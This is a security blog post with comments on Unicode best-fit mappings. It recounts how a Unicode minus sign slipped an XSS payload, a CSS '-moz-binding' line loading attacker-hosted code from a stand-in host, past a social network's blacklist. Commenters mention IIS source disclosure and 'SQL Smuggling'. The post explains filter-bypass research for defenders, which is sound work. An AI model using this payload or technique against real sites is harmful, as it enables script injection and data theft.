Unicode security attacks and test cases – Best-fit mappings and String transformations

Best-fit mappings are another complex topic in Unicode, easily overlooked or misunderstood.  On the defensive side, if you can only remember two things:

  1. Converting to Unicode is safe.

  2. Converting between legacy character sets is dangerous.

Ah forget it, unfortunately it’s more complicated than that, because basic string handling can also trigger best-fit behavior even when you aren’t intentionally converting between encodings or charsets.

The term best-fit mapping describes the concept of how a character should be represented when it doesn’t have an explicit place in a destination character set.

I’ve actually pulled off some interesting cross-site scripting attacks by exploiting best-fit mappings. In 2008 I was testing a popular social networking app. They just implemented a new profile editor complete with user-ccontrolled CSS. They were smart though, they actually knew that stuff like this would lead to XSS:

−moz−binding: url(http://nottrusted.com/gotcha.xml#xss)

So they implemented some sort of blacklist because well that’s common. Anyway, somewhere in the callstack of their parsing and filtering, the string I passed in was being transformed. To get to the point, I eventually figured out I could manipulate the input with a character that would pass through their filter, and come out transformed into the character I needed. The input:

−moz−binding: url(http://nottrusted.com/gotcha.xml#xss)

The first character here is U+2212, the MINUS SIGN (−) which was being transformed through an apparent best-fit mapping into U+002D, or -.

The Watcher security testing tool I released a few months ago has a new check coming to detect string transformations like this. My plan was to detect spots where strings can be manipulated to pull off attacks like I just described. Does anyone want to test this, and are there any other good stories about manipulating best-fit mappings to pull off attacks?
I really like to test new versions of IIS + .Net to see if I can bypass some protections by using Unicodes. Maybe we can reopen very old vulnerabilities such as file.asp::$Data which shows the source of file.


Belatedly... a couple years ago I spoke at RSA conference and OWASP about some research I did using best fit mappings to bypass input validation, stored procedure bindings, etc and mount SQL Injection attacks. Because of the architectural aspect, I labeled this sub-class "SQL Smuggling". Details posted at http://www.securityfocus.com/archive/1/496165/30/0/threaded.

Thanks for sharing Avi. I started a testing guide to capture more of this information but laid it down as time is too limited these days. If you're interested in looking at this let me know. One goal I had was to inventory common database connection drivers that display the type of behavior you labeled 'SQL Smuggling'. The phenomena is common across technologies as you're aware but focusing on the database drivers would help people tune them accordingly.